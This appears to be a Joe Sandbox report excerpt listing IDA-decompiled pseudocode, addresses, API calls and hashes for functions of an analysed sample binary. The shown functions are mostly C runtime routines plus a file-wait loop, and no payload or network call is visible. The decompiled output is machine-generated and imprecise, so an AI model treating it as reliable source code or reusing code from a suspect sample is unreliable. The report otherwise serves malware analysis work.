                                                                                                                                      							__eflags = _t82 - _t89;
                                                                                                                                      							if(__eflags < 0) {
                                                                                                                                      								L12:
                                                                                                                                      								_v5 = 0;
                                                                                                                                      								_t50 = E0131832F(_t82, __eflags,  &_v16,  &_v5);
                                                                                                                                      								_t75 = _v16;
                                                                                                                                      								 *((intOrPtr*)(_t101 + 0x14)) = _t50;
                                                                                                                                      								_t52 = E01322B10(_t75, _v12, 0x15180, 0);
                                                                                                                                      								 *(_t101 + 0x1c) = _t52;
                                                                                                                                      								_t86 = 0x1328f5c;
                                                                                                                                      								_t76 = _t75 - _t52 * 0x15180;
                                                                                                                                      								asm("sbb eax, edx");
                                                                                                                                      								__eflags = _v5;
                                                                                                                                      								if(_v5 == 0) {
                                                                                                                                      									_t86 = 0x1328f28;
                                                                                                                                      								}
                                                                                                                                      								_t91 =  *(_t101 + 0x1c);
                                                                                                                                      								_t56 = 1;
                                                                                                                                      								__eflags =  *((intOrPtr*)(_t86 + 4)) - _t91;
                                                                                                                                      								if( *((intOrPtr*)(_t86 + 4)) >= _t91) {
                                                                                                                                      									L16:
                                                                                                                                      									_t57 = _t56 - 1;
                                                                                                                                      									 *(_t101 + 0x10) = _t57;
                                                                                                                                      									 *((intOrPtr*)(_t101 + 0xc)) = _t91 -  *((intOrPtr*)(_t86 + _t57 * 4));
                                                                                                                                      									_t59 = E01322B10( *_t98,  *((intOrPtr*)(_t98 + 4)), 0x15180, 0);
                                                                                                                                      									_t87 = 7;
                                                                                                                                      									asm("cdq");
                                                                                                                                      									 *(_t101 + 0x18) = (_t59 + 4) % _t87;
                                                                                                                                      									_t63 = E01322B10(_t76, _v12, 0xe10, 0);
                                                                                                                                      									 *(_t101 + 8) = _t63;
                                                                                                                                      									_t77 = _t76 - _t63 * 0xe10;
                                                                                                                                      									asm("sbb edi, edx");
                                                                                                                                      									_t65 = E01322B10(_t77, _v12, 0x3c, 0);
                                                                                                                                      									 *(_t101 + 0x20) =  *(_t101 + 0x20) & 0x00000000;
                                                                                                                                      									 *(_t101 + 4) = _t65;
                                                                                                                                      									_t67 = 0;
                                                                                                                                      									__eflags = 0;
                                                                                                                                      									 *_t101 = _t77 - _t65 * 0x3c;
                                                                                                                                      									L17:
                                                                                                                                      									return _t67;
                                                                                                                                      								} else {
                                                                                                                                      									do {
                                                                                                                                      										_t56 = _t56 + 1;
                                                                                                                                      										__eflags =  *((intOrPtr*)(_t86 + _t56 * 4)) - _t91;
                                                                                                                                      									} while ( *((intOrPtr*)(_t86 + _t56 * 4)) < _t91);
                                                                                                                                      									goto L16;
                                                                                                                                      								}
                                                                                                                                      							}
                                                                                                                                      							if(__eflags > 0) {
                                                                                                                                      								L10:
                                                                                                                                      								_t68 = E01313CD1();
                                                                                                                                      								_t102 = 0x16;
                                                                                                                                      								 *_t68 = _t102;
                                                                                                                                      								L11:
                                                                                                                                      								_t67 = _t102;
                                                                                                                                      								goto L17;
                                                                                                                                      							}
                                                                                                                                      							__eflags = _t47 - 0x934126cf;
                                                                                                                                      							if(__eflags <= 0) {
                                                                                                                                      								goto L12;
                                                                                                                                      							}
                                                                                                                                      							goto L10;
                                                                                                                                      						}
                                                                                                                                      						if(__eflags < 0) {
                                                                                                                                      							goto L10;
                                                                                                                                      						}
                                                                                                                                      						__eflags = _t47 - 0xffff5740;
                                                                                                                                      						if(_t47 < 0xffff5740) {
                                                                                                                                      							goto L10;
                                                                                                                                      						}
                                                                                                                                      						goto L7;
                                                                                                                                      					}
                                                                                                                                      					_t69 = E01313CD1();
                                                                                                                                      					_t102 = 0x16;
                                                                                                                                      					 *_t69 = _t102;
                                                                                                                                      					E013110B9();
                                                                                                                                      					goto L11;
                                                                                                                                      				}
                                                                                                                                      				_t71 = E01313CD1();
                                                                                                                                      				_t103 = 0x16;
                                                                                                                                      				 *_t71 = _t103;
                                                                                                                                      				E013110B9();
                                                                                                                                      				return _t103;
                                                                                                                                      			}
































                                                                                                                                      0x013181eb
                                                                                                                                      0x013181f0
                                                                                                                                      0x01318210
                                                                                                                                      0x01318211
                                                                                                                                      0x01318213
                                                                                                                                      0x01318216
                                                                                                                                      0x01318218
                                                                                                                                      0x0131822b
                                                                                                                                      0x0131822e
                                                                                                                                      0x01318230
                                                                                                                                      0x01318233
                                                                                                                                      0x01318236
                                                                                                                                      0x01318239
                                                                                                                                      0x01318244
                                                                                                                                      0x01318246
                                                                                                                                      0x01318247
                                                                                                                                      0x01318249
                                                                                                                                      0x01318265
                                                                                                                                      0x01318269
                                                                                                                                      0x01318272
                                                                                                                                      0x01318277
                                                                                                                                      0x0131827e
                                                                                                                                      0x0131828b
                                                                                                                                      0x01318290
                                                                                                                                      0x0131829a
                                                                                                                                      0x0131829f
                                                                                                                                      0x013182a4
                                                                                                                                      0x013182a6
                                                                                                                                      0x013182ad
                                                                                                                                      0x013182af
                                                                                                                                      0x013182af
                                                                                                                                      0x013182b4
                                                                                                                                      0x013182b9
                                                                                                                                      0x013182ba
                                                                                                                                      0x013182bd
                                                                                                                                      0x013182c5
                                                                                                                                      0x013182c5
                                                                                                                                      0x013182c6
                                                                                                                                      0x013182d4
                                                                                                                                      0x013182dc
                                                                                                                                      0x013182e9
                                                                                                                                      0x013182ea
                                                                                                                                      0x013182f4
                                                                                                                                      0x013182fa
                                                                                                                                      0x01318304
                                                                                                                                      0x0131830b
                                                                                                                                      0x0131830f
                                                                                                                                      0x01318313
                                                                                                                                      0x01318318
                                                                                                                                      0x0131831c
                                                                                                                                      0x01318324
                                                                                                                                      0x01318324
                                                                                                                                      0x01318326
                                                                                                                                      0x01318329
                                                                                                                                      0x00000000
                                                                                                                                      0x013182bf
                                                                                                                                      0x013182bf
                                                                                                                                      0x013182bf
                                                                                                                                      0x013182c0
                                                                                                                                      0x013182c0
                                                                                                                                      0x00000000
                                                                                                                                      0x013182bf
                                                                                                                                      0x013182bd
                                                                                                                                      0x0131824b
                                                                                                                                      0x01318254
                                                                                                                                      0x01318254
                                                                                                                                      0x0131825b
                                                                                                                                      0x0131825c
                                                                                                                                      0x0131825e
                                                                                                                                      0x0131825e
                                                                                                                                      0x00000000
                                                                                                                                      0x0131825e
                                                                                                                                      0x0131824d
                                                                                                                                      0x01318252
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01318252
                                                                                                                                      0x0131823b
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0131823d
                                                                                                                                      0x01318242
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01318242
                                                                                                                                      0x0131821a
                                                                                                                                      0x01318221
                                                                                                                                      0x01318222
                                                                                                                                      0x01318224
                                                                                                                                      0x00000000
                                                                                                                                      0x01318224
                                                                                                                                      0x013181f2
                                                                                                                                      0x013181f9
                                                                                                                                      0x013181fa
                                                                                                                                      0x013181fc
                                                                                                                                      0x00000000

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 7cd4cc97b5b5489f928bb13cf48cc0b98093ba7cce515e58f1edf585049496e8
                                                                                                                                      • Instruction ID: 1ac72e4f9d16361adf84021c95530c42164eb6e8dc5ff8a17070b76d040ef39c
                                                                                                                                      • Opcode Fuzzy Hash: 7cd4cc97b5b5489f928bb13cf48cc0b98093ba7cce515e58f1edf585049496e8
                                                                                                                                      • Instruction Fuzzy Hash: CF412971B00705AFD729AF7CCC40BEABBE9EB88718F104A6AF511DB684D77195058784
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 81%
                                                                                                                                      			E0131AC82(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                                                                                                                                      				signed int _v8;
                                                                                                                                      				int _v12;
                                                                                                                                      				char _v16;
                                                                                                                                      				intOrPtr _v24;
                                                                                                                                      				char _v28;
                                                                                                                                      				void* _v40;
                                                                                                                                      				signed int _t34;
                                                                                                                                      				signed int _t40;
                                                                                                                                      				int _t46;
                                                                                                                                      				int _t53;
                                                                                                                                      				void* _t55;
                                                                                                                                      				int _t57;
                                                                                                                                      				signed int _t63;
                                                                                                                                      				int _t67;
                                                                                                                                      				short* _t69;
                                                                                                                                      				signed int _t70;
                                                                                                                                      				short* _t71;
                                                                                                                                      
                                                                                                                                      				_t34 =  *0x132e00c; // 0x17120af4
                                                                                                                                      				_v8 = _t34 ^ _t70;
                                                                                                                                      				E0130E1A2(__ebx,  &_v28, __edx, _a4);
                                                                                                                                      				_t57 = _a24;
                                                                                                                                      				if(_t57 == 0) {
                                                                                                                                      					_t6 = _v24 + 8; // 0xace85006
                                                                                                                                      					_t53 =  *_t6;
                                                                                                                                      					_t57 = _t53;
                                                                                                                                      					_a24 = _t53;
                                                                                                                                      				}
                                                                                                                                      				_t67 = 0;
                                                                                                                                      				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                                                                                                      				_v12 = _t40;
                                                                                                                                      				if(_t40 == 0) {
                                                                                                                                      					L15:
                                                                                                                                      					if(_v16 != 0) {
                                                                                                                                      						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                                                                                                                                      					}
                                                                                                                                      					return E0130A07B(_v8 ^ _t70);
                                                                                                                                      				}
                                                                                                                                      				_t55 = _t40 + _t40;
                                                                                                                                      				asm("sbb eax, eax");
                                                                                                                                      				if((_t55 + 0x00000008 & _t40) == 0) {
                                                                                                                                      					_t69 = 0;
                                                                                                                                      					L11:
                                                                                                                                      					if(_t69 != 0) {
                                                                                                                                      						E0130C510(_t67, _t69, _t67, _t55);
                                                                                                                                      						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
                                                                                                                                      						if(_t46 != 0) {
                                                                                                                                      							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
                                                                                                                                      						}
                                                                                                                                      					}
                                                                                                                                      					L14:
                                                                                                                                      					E0131407D(_t69);
                                                                                                                                      					goto L15;
                                                                                                                                      				}
                                                                                                                                      				asm("sbb eax, eax");
                                                                                                                                      				_t48 = _t40 & _t55 + 0x00000008;
                                                                                                                                      				_t63 = _t55 + 8;
                                                                                                                                      				if((_t40 & _t55 + 0x00000008) > 0x400) {
                                                                                                                                      					asm("sbb eax, eax");
                                                                                                                                      					_t69 = E013151CD(_t63, _t48 & _t63);
                                                                                                                                      					if(_t69 == 0) {
                                                                                                                                      						goto L14;
                                                                                                                                      					}
                                                                                                                                      					 *_t69 = 0xdddd;
                                                                                                                                      					L9:
                                                                                                                                      					_t69 =  &(_t69[4]);
                                                                                                                                      					goto L11;
                                                                                                                                      				}
                                                                                                                                      				asm("sbb eax, eax");
                                                                                                                                      				E01322CE0();
                                                                                                                                      				_t69 = _t71;
                                                                                                                                      				if(_t69 == 0) {
                                                                                                                                      					goto L14;
                                                                                                                                      				}
                                                                                                                                      				 *_t69 = 0xcccc;
                                                                                                                                      				goto L9;
                                                                                                                                      			}




















                                                                                                                                      0x0131ac8a
                                                                                                                                      0x0131ac91
                                                                                                                                      0x0131ac9d
                                                                                                                                      0x0131aca2
                                                                                                                                      0x0131aca7
                                                                                                                                      0x0131acac
                                                                                                                                      0x0131acac
                                                                                                                                      0x0131acaf
                                                                                                                                      0x0131acb1
                                                                                                                                      0x0131acb1
                                                                                                                                      0x0131acb6
                                                                                                                                      0x0131accf
                                                                                                                                      0x0131acd5
                                                                                                                                      0x0131acda
                                                                                                                                      0x0131ad79
                                                                                                                                      0x0131ad7d
                                                                                                                                      0x0131ad82
                                                                                                                                      0x0131ad82
                                                                                                                                      0x0131ad9e
                                                                                                                                      0x0131ad9e
                                                                                                                                      0x0131ace0
                                                                                                                                      0x0131ace8
                                                                                                                                      0x0131acec
                                                                                                                                      0x0131ad38
                                                                                                                                      0x0131ad3a
                                                                                                                                      0x0131ad3c
                                                                                                                                      0x0131ad41
                                                                                                                                      0x0131ad58
                                                                                                                                      0x0131ad60
                                                                                                                                      0x0131ad70
                                                                                                                                      0x0131ad70
                                                                                                                                      0x0131ad60
                                                                                                                                      0x0131ad72
                                                                                                                                      0x0131ad73
                                                                                                                                      0x00000000
                                                                                                                                      0x0131ad78
                                                                                                                                      0x0131acf3
                                                                                                                                      0x0131acf5
                                                                                                                                      0x0131acf7
                                                                                                                                      0x0131acff
                                                                                                                                      0x0131ad1c
                                                                                                                                      0x0131ad26
                                                                                                                                      0x0131ad2b
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0131ad2d
                                                                                                                                      0x0131ad33
                                                                                                                                      0x0131ad33
                                                                                                                                      0x00000000
                                                                                                                                      0x0131ad33
                                                                                                                                      0x0131ad03
                                                                                                                                      0x0131ad07
                                                                                                                                      0x0131ad0c
                                                                                                                                      0x0131ad10
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0131ad12
                                                                                                                                      0x00000000

                                                                                                                                      APIs
                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,ACE85006,0130EDE5,00000000,00000000,01310352,?,01310352,?,00000001,0130EDE5,ACE85006,00000001,01310352,01310352), ref: 0131ACCF
                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0131AD58
                                                                                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0131AD6A
                                                                                                                                      • __freea.LIBCMT ref: 0131AD73
                                                                                                                                        • Part of subcall function 013151CD: RtlAllocateHeap.NTDLL(00000000,0130969E,00000000,?,0130C747,00000002,00000000,?,?,?,013095B7,0130969E,00000004,00000000,00000000,00000000), ref: 013151FF
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2652629310-0
                                                                                                                                      • Opcode ID: c21e729c96c1d971bede6e0fc8346cf1c3e3d72683b4f473ac31c934662066b4
                                                                                                                                      • Instruction ID: 84982e7ba34637eadc6f1c18b9902d54edfca21cab919f30d31f420bb9e807b4
                                                                                                                                      • Opcode Fuzzy Hash: c21e729c96c1d971bede6e0fc8346cf1c3e3d72683b4f473ac31c934662066b4
                                                                                                                                      • Instruction Fuzzy Hash: D4311272A0164AABDF299FA9CC54EEF7BA5EF4031AF444128EC04D7294E735CD50CBA0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                      			E01312F30(signed int __eax, void* __ecx) {
                                                                                                                                      				signed int _t2;
                                                                                                                                      				signed int _t3;
                                                                                                                                      				int _t10;
                                                                                                                                      				int _t11;
                                                                                                                                      				void* _t13;
                                                                                                                                      				short** _t16;
                                                                                                                                      				char* _t19;
                                                                                                                                      				void* _t20;
                                                                                                                                      
                                                                                                                                      				_t13 = __ecx;
                                                                                                                                      				_t16 =  *0x132f00c; // 0x14e5a30
                                                                                                                                      				if(_t16 != 0) {
                                                                                                                                      					_t10 = 0;
                                                                                                                                      					while( *_t16 != _t10) {
                                                                                                                                      						_t2 = WideCharToMultiByte(_t10, _t10,  *_t16, 0xffffffff, _t10, _t10, _t10, _t10);
                                                                                                                                      						_t11 = _t2;
                                                                                                                                      						if(_t11 == 0) {
                                                                                                                                      							L11:
                                                                                                                                      							_t3 = _t2 | 0xffffffff;
                                                                                                                                      						} else {
                                                                                                                                      							_t19 = E013145B8(_t13, _t11, 1);
                                                                                                                                      							_pop(_t13);
                                                                                                                                      							if(_t19 == 0) {
                                                                                                                                      								L10:
                                                                                                                                      								_t2 = E01314615(_t19);
                                                                                                                                      								goto L11;
                                                                                                                                      							} else {
                                                                                                                                      								_t10 = 0;
                                                                                                                                      								if(WideCharToMultiByte(0, 0,  *_t16, 0xffffffff, _t19, _t11, 0, 0) == 0) {
                                                                                                                                      									goto L10;
                                                                                                                                      								} else {
                                                                                                                                      									_push(0);
                                                                                                                                      									_push(_t19);
                                                                                                                                      									E0131A0DE();
                                                                                                                                      									E01314615(0);
                                                                                                                                      									_t20 = _t20 + 0xc;
                                                                                                                                      									_t16 =  &(_t16[1]);
                                                                                                                                      									continue;
                                                                                                                                      								}
                                                                                                                                      							}
                                                                                                                                      						}
                                                                                                                                      						L9:
                                                                                                                                      						return _t3;
                                                                                                                                      						goto L12;
                                                                                                                                      					}
                                                                                                                                      					_t3 = 0;
                                                                                                                                      					goto L9;
                                                                                                                                      				} else {
                                                                                                                                      					return __eax | 0xffffffff;
                                                                                                                                      				}
                                                                                                                                      				L12:
                                                                                                                                      			}











                                                                                                                                      0x01312f30
                                                                                                                                      0x01312f33
                                                                                                                                      0x01312f3b
                                                                                                                                      0x01312f44
                                                                                                                                      0x01312f99
                                                                                                                                      0x01312f52
                                                                                                                                      0x01312f58
                                                                                                                                      0x01312f5c
                                                                                                                                      0x01312faa
                                                                                                                                      0x01312faa
                                                                                                                                      0x01312f5e
                                                                                                                                      0x01312f66
                                                                                                                                      0x01312f69
                                                                                                                                      0x01312f6c
                                                                                                                                      0x01312fa3
                                                                                                                                      0x01312fa4
                                                                                                                                      0x00000000
                                                                                                                                      0x01312f6e
                                                                                                                                      0x01312f78
                                                                                                                                      0x01312f84
                                                                                                                                      0x00000000
                                                                                                                                      0x01312f86
                                                                                                                                      0x01312f86
                                                                                                                                      0x01312f87
                                                                                                                                      0x01312f88
                                                                                                                                      0x01312f8e
                                                                                                                                      0x01312f93
                                                                                                                                      0x01312f96
                                                                                                                                      0x00000000
                                                                                                                                      0x01312f96
                                                                                                                                      0x01312f84
                                                                                                                                      0x01312f6c
                                                                                                                                      0x01312f9f
                                                                                                                                      0x01312fa2
                                                                                                                                      0x00000000
                                                                                                                                      0x01312fa2
                                                                                                                                      0x01312f9d
                                                                                                                                      0x00000000
                                                                                                                                      0x01312f3d
                                                                                                                                      0x01312f41
                                                                                                                                      0x01312f41
                                                                                                                                      0x00000000

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0af76acb2dd84c0cc9c49b60a50017facdca74ef7811d544aa6a9b6151051b5c
                                                                                                                                      • Instruction ID: 3d2e2ade80f23f9a696937ce8709bdb06833bf1e2fad406035f32e7ae2adad39
                                                                                                                                      • Opcode Fuzzy Hash: 0af76acb2dd84c0cc9c49b60a50017facdca74ef7811d544aa6a9b6151051b5c
                                                                                                                                      • Instruction Fuzzy Hash: DF01A2B220A2167EF629297CBCC0F27661DDB917BCF350329F521511CCDBA08D0846A0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                      			E0130183D(void* __edx) {
                                                                                                                                      				void* __ecx;
                                                                                                                                      				signed int _t9;
                                                                                                                                      				int _t10;
                                                                                                                                      				long _t15;
                                                                                                                                      				void* _t18;
                                                                                                                                      				void* _t23;
                                                                                                                                      				void* _t24;
                                                                                                                                      				void* _t25;
                                                                                                                                      				void* _t26;
                                                                                                                                      				void* _t31;
                                                                                                                                      
                                                                                                                                      				_t23 = __edx;
                                                                                                                                      				_t9 =  *0x132fa10; // 0x0
                                                                                                                                      				_t10 = _t9 |  *0x132fa14;
                                                                                                                                      				_t25 = _t18;
                                                                                                                                      				if(_t10 != 0) {
                                                                                                                                      					 *((char*)(_t25 + 0x39)) = 0;
                                                                                                                                      					do {
                                                                                                                                      						_t10 = CreateFileW(E01302712(0x132f9c8, 0), 0x80000000, 7, 0, 3, 0x80, 0);
                                                                                                                                      						_t24 = _t10;
                                                                                                                                      						if(_t24 == 0xffffffff) {
                                                                                                                                      							 *((char*)(_t25 + 0x39)) = 0;
                                                                                                                                      						} else {
                                                                                                                                      							_t15 = GetFileSize(_t24, 0);
                                                                                                                                      							_t31 = 0 -  *0x132fa14; // 0x0
                                                                                                                                      							if(_t31 >= 0 && (_t31 > 0 || _t15 >=  *0x132fa10)) {
                                                                                                                                      								 *((char*)(_t25 + 0x39)) = 1;
                                                                                                                                      								_t33 =  *((intOrPtr*)(_t25 + 0x50));
                                                                                                                                      								if( *((intOrPtr*)(_t25 + 0x50)) != 0) {
                                                                                                                                      									E01301D38(_t25, _t23, _t33);
                                                                                                                                      								}
                                                                                                                                      								Sleep(0x2710);
                                                                                                                                      							}
                                                                                                                                      							_t10 = CloseHandle(_t24);
                                                                                                                                      						}
                                                                                                                                      					} while ( *((char*)(_t25 + 0x39)) == 1);
                                                                                                                                      					if( *((intOrPtr*)(_t25 + 0x50)) == 0) {
                                                                                                                                      						_t36 =  *((char*)(_t25 + 0x49)) - 0x31;
                                                                                                                                      						if( *((char*)(_t25 + 0x49)) == 0x31) {
                                                                                                                                      							E01302814(_t26 - 0x18, _t23, _t36, _t25 + 0x68);
                                                                                                                                      							return E013013D7(_t25, _t23, _t36);
                                                                                                                                      						}
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      				return _t10;
                                                                                                                                      			}













                                                                                                                                      0x0130183d
                                                                                                                                      0x0130183e
                                                                                                                                      0x01301843
                                                                                                                                      0x0130184c
                                                                                                                                      0x0130184e
                                                                                                                                      0x01301856
                                                                                                                                      0x01301859
                                                                                                                                      0x01301874
                                                                                                                                      0x0130187a
                                                                                                                                      0x0130187f
                                                                                                                                      0x013018bf
                                                                                                                                      0x01301881
                                                                                                                                      0x01301883
                                                                                                                                      0x01301889
                                                                                                                                      0x0130188f
                                                                                                                                      0x0130189b
                                                                                                                                      0x0130189f
                                                                                                                                      0x013018a2
                                                                                                                                      0x013018a6
                                                                                                                                      0x013018a6
                                                                                                                                      0x013018b0
                                                                                                                                      0x013018b0
                                                                                                                                      0x013018b7
                                                                                                                                      0x013018b7
                                                                                                                                      0x013018c2
                                                                                                                                      0x013018cb
                                                                                                                                      0x013018cd
                                                                                                                                      0x013018d1
                                                                                                                                      0x013018dc
                                                                                                                                      0x00000000
                                                                                                                                      0x013018e3
                                                                                                                                      0x013018d1
                                                                                                                                      0x013018cb
                                                                                                                                      0x013018ec

                                                                                                                                      APIs
                                                                                                                                      • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,?,01301907,?,?,?,013014C5), ref: 01301874
                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,01301907,?,?,?,013014C5), ref: 01301883
                                                                                                                                      • Sleep.KERNEL32(00002710), ref: 013018B0
                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,01301907,?,?,?,013014C5), ref: 013018B7
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$CloseCreateHandleSizeSleep
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1958988193-0
                                                                                                                                      • Opcode ID: 70172deb6ae77900d48626be95b850b4f0a02a6be892ae11a15b5a673dd0b4ba
                                                                                                                                      • Instruction ID: f4c0fd8db7c000ea544cf481175ffc5094b9f23860cf9e735cd2d9bd309dc73e
                                                                                                                                      • Opcode Fuzzy Hash: 70172deb6ae77900d48626be95b850b4f0a02a6be892ae11a15b5a673dd0b4ba
                                                                                                                                      • Instruction Fuzzy Hash: 1211EB307007406AF733BA2CA9A9B2F7FEEAB5671CF14050DE282539C5C750E7448722
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                      			E01312FAF(signed int __eax, void* __ecx) {
                                                                                                                                      				signed int _t2;
                                                                                                                                      				signed int _t3;
                                                                                                                                      				int _t10;
                                                                                                                                      				int _t11;
                                                                                                                                      				void* _t13;
                                                                                                                                      				char** _t16;
                                                                                                                                      				short* _t19;
                                                                                                                                      				void* _t20;
                                                                                                                                      
                                                                                                                                      				_t13 = __ecx;
                                                                                                                                      				_t16 =  *0x132f008; // 0x14ce9f8
                                                                                                                                      				if(_t16 != 0) {
                                                                                                                                      					_t10 = 0;
                                                                                                                                      					while( *_t16 != _t10) {
                                                                                                                                      						_t2 = MultiByteToWideChar(_t10, _t10,  *_t16, 0xffffffff, _t10, _t10);
                                                                                                                                      						_t11 = _t2;
                                                                                                                                      						if(_t11 == 0) {
                                                                                                                                      							L11:
                                                                                                                                      							_t3 = _t2 | 0xffffffff;
                                                                                                                                      						} else {
                                                                                                                                      							_t19 = E013145B8(_t13, _t11, 2);
                                                                                                                                      							_pop(_t13);
                                                                                                                                      							if(_t19 == 0) {
                                                                                                                                      								L10:
                                                                                                                                      								_t2 = E01314615(_t19);
                                                                                                                                      								goto L11;
                                                                                                                                      							} else {
                                                                                                                                      								_t10 = 0;
                                                                                                                                      								if(MultiByteToWideChar(0, 0,  *_t16, 0xffffffff, _t19, _t11) == 0) {
                                                                                                                                      									goto L10;
                                                                                                                                      								} else {
                                                                                                                                      									_push(0);
                                                                                                                                      									_push(_t19);
                                                                                                                                      									E0131A0E9(_t13);
                                                                                                                                      									E01314615(0);
                                                                                                                                      									_t20 = _t20 + 0xc;
                                                                                                                                      									_t16 =  &(_t16[1]);
                                                                                                                                      									continue;
                                                                                                                                      								}
                                                                                                                                      							}
                                                                                                                                      						}
                                                                                                                                      						L9:
                                                                                                                                      						return _t3;
                                                                                                                                      						goto L12;
                                                                                                                                      					}
                                                                                                                                      					_t3 = 0;
                                                                                                                                      					goto L9;
                                                                                                                                      				} else {
                                                                                                                                      					return __eax | 0xffffffff;
                                                                                                                                      				}
                                                                                                                                      				L12:
                                                                                                                                      			}











                                                                                                                                      0x01312faf
                                                                                                                                      0x01312fb2
                                                                                                                                      0x01312fba
                                                                                                                                      0x01312fc3
                                                                                                                                      0x01313012
                                                                                                                                      0x01312fcf
                                                                                                                                      0x01312fd5
                                                                                                                                      0x01312fd9
                                                                                                                                      0x01313023
                                                                                                                                      0x01313023
                                                                                                                                      0x01312fdb
                                                                                                                                      0x01312fe3
                                                                                                                                      0x01312fe6
                                                                                                                                      0x01312fe9
                                                                                                                                      0x0131301c
                                                                                                                                      0x0131301d
                                                                                                                                      0x00000000
                                                                                                                                      0x01312feb
                                                                                                                                      0x01312ff1
                                                                                                                                      0x01312ffd
                                                                                                                                      0x00000000
                                                                                                                                      0x01312fff
                                                                                                                                      0x01312fff
                                                                                                                                      0x01313000
                                                                                                                                      0x01313001
                                                                                                                                      0x01313007
                                                                                                                                      0x0131300c
                                                                                                                                      0x0131300f
                                                                                                                                      0x00000000
